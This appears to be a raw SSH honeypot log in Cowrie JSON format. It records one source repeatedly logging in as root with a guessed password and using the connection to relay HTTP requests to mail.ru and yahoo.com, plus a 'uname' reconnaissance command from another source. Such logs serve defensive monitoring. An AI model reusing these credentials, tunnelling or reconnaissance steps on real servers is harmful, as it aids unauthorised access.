{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.964324Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.015898Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39853,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c637355c8b","protocol":"ssh","message":"New connection: 77.83.207.83:39853 (1.2.3.4:22) [session: c0c637355c8b]","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.064103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.064959Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.114533Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.362436Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7675,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7675","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.413525Z","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.463310Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":4870,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4870","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.604262Z","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.654087Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":4341,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4341","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.796027Z","session":"c0c637355c8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.845832Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.896503Z","src_ip":"77.83.207.83","session":"c0c637355c8b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39935,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6c91a7f61b0","protocol":"ssh","message":"New connection: 77.83.207.83:39935 (1.2.3.4:22) [session: a6c91a7f61b0]","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.946094Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:44:24.962904Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.963605Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:24.964812Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.014836Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.267424Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26518,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26518","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.319118Z","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.369873Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20198,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20198","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.513134Z","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.563906Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5659,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5659","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.709280Z","session":"a6c91a7f61b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.760299Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.812060Z","src_ip":"77.83.207.83","session":"a6c91a7f61b0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":40151,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e9dd1ce22ce","protocol":"ssh","message":"New connection: 77.83.207.83:40151 (1.2.3.4:22) [session: 7e9dd1ce22ce]","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.860919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.861822Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:25.911455Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.158967Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14355,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14355","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.209453Z","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.259559Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26663,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26663","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.400334Z","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.450104Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":693,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:693","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.592107Z","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.642174Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.692660Z","src_ip":"77.83.207.83","session":"7e9dd1ce22ce"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":40989,"dst_ip":"1.2.3.4","dst_port":22,"session":"b19248c39369","protocol":"ssh","message":"New connection: 77.83.207.83:40989 (1.2.3.4:22) [session: b19248c39369]","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.741749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.742650Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:26.792591Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.042027Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26336,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26336","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.093296Z","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.143343Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11088,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11088","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.284328Z","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.334127Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28154,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28154","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.476292Z","session":"b19248c39369"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.526474Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.577492Z","src_ip":"77.83.207.83","session":"b19248c39369"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":41842,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b9e613b139e","protocol":"ssh","message":"New connection: 77.83.207.83:41842 (1.2.3.4:22) [session: 3b9e613b139e]","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.630503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.631391Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.685316Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:27.951406Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
